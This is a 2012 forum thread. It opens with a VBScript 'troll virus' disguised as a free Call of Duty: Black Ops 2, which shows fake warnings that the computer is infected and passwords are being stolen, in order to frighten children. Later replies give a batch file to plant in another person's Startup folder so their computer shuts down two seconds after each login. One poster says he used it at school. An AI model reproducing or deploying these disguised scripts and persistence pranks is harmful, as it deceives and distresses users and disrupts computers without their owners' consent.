[Virus] Trick Little Kiddies [Troll]

wite

Posting Freak
Aug 3, 2012
Hey,

This is a troll virus I made to trick little kids.
Basically it is this:
oa2g69.png

Looks like a copy of Call of Duty: Black Ops 2.

But it isn't... it actually opens to be a 100% FAKE virus.
It will come up with several virus warnings, just to troll kids who are stupid.
This is COMPLETELY harmless and the idea of it is to troll kids who thought they could get Black Ops 2 for free :p

How do I get one for myself?
1. Open a new Notepad file.
2. Enter this text as it is:
Code:
X=MsgBox("Windows is unable to open 'Black Ops 2'",5+48,"Unable to open !")

X=MsgBox("Windows has detected a virus !",0+16,"Virus Detection")

X=MsgBox("Do you want to scan your computer?",4+16,"Virus Scan")

X=MsgBox("Virus scan failed, system files are deleting !",0+16,"Windows System Files")

X=MsgBox("Virus is copying all your password and sending them off !",2+48,"Password Stealer")

X=MsgBox("Windows is shutting down in 30 seconds",0+16,"Windows Files Missing !")

X=MsgBox("You have just been trolled !",0+64,"Got ya bobba !")
3. Save it anywhere except the Desktop, don't put it on the Desktop. Save it as Black Ops 2.vbs (MUST BE .vbs)
4. Find it where ever you saved it than Right Click>Send to>Desktop (create shortcut)
5. Go to your Desktop, find the file and click "Rename" than rename it to "Black Ops 2"
6. Time to change the icon, right click on the file>Properties>Change icon... Than change it to whatever you like and save/apply the changes.
7. Open the file, and there you have it. A fake virus to troll kids who tried to get Black Ops 2 for free :rasta:

Enjoy!

Thanks,
Supa.

EDIT: This does completely NO harm to your computer at all, and can be deleted at any time!

Macemore

Circumcised pineapples
Aug 26, 2011
For those that don't know how to read code, or just don't care to:

My seal of approval :)

DrPepper

I drink myself on a regular basis get over it
Jul 14, 2012
Just gave me the idea for a scam :D Lol jk but this is cool gonna trick my sister with it

Macemore

Circumcised pineapples
Aug 26, 2011
If you ever manage to get onto someone's computer that you don't like:
1) goto Start -> All Programs/Programs -> Find "Startup" -> right click and click "open"
2) Make a new file, call it anything with .bat at the end (must be .bat, not .bat.txt or anything)
3) In the batch (.bat) file type:
Code:
@echo off
shutdown -s -c "Your comment here" -t 2
save it, make sure it's in the Startup folder.
This will make it so everytime they log into that user, they will be shutdown after 2 seconds, replace "Your comment here" with anything you want to say within the 2 seconds, as long as it'sin quotes.
Also: if you have administrator rights, for step 1 instead of right click and click open, click open for all users, even better :).

wite

Posting Freak
Aug 3, 2012
If you ever manage to get onto someone's computer that you don't like:
1) goto Start -> All Programs/Programs -> Find "Startup" -> right click and click "open"
2) Make a new file, call it anything with .bat at the end (must be .bat, not .bat.txt or anything)
3) In the batch (.bat) file type:
Code:
@echo off
shutdown -s -c "Your comment here" -t 2
save it, make sure it's in the Startup folder.
This will make it so everytime they log into that user, they will be shutdown after 2 seconds, replace "Your comment here" with anything you want to say within the 2 seconds, as long as it'sin quotes.
Also: if you have administrator rights, for step 1 instead of right click and click open, click open for all users, even better :).
I did this at school, and since then they have blocked us accessing All Programs :p

Users who are viewing this thread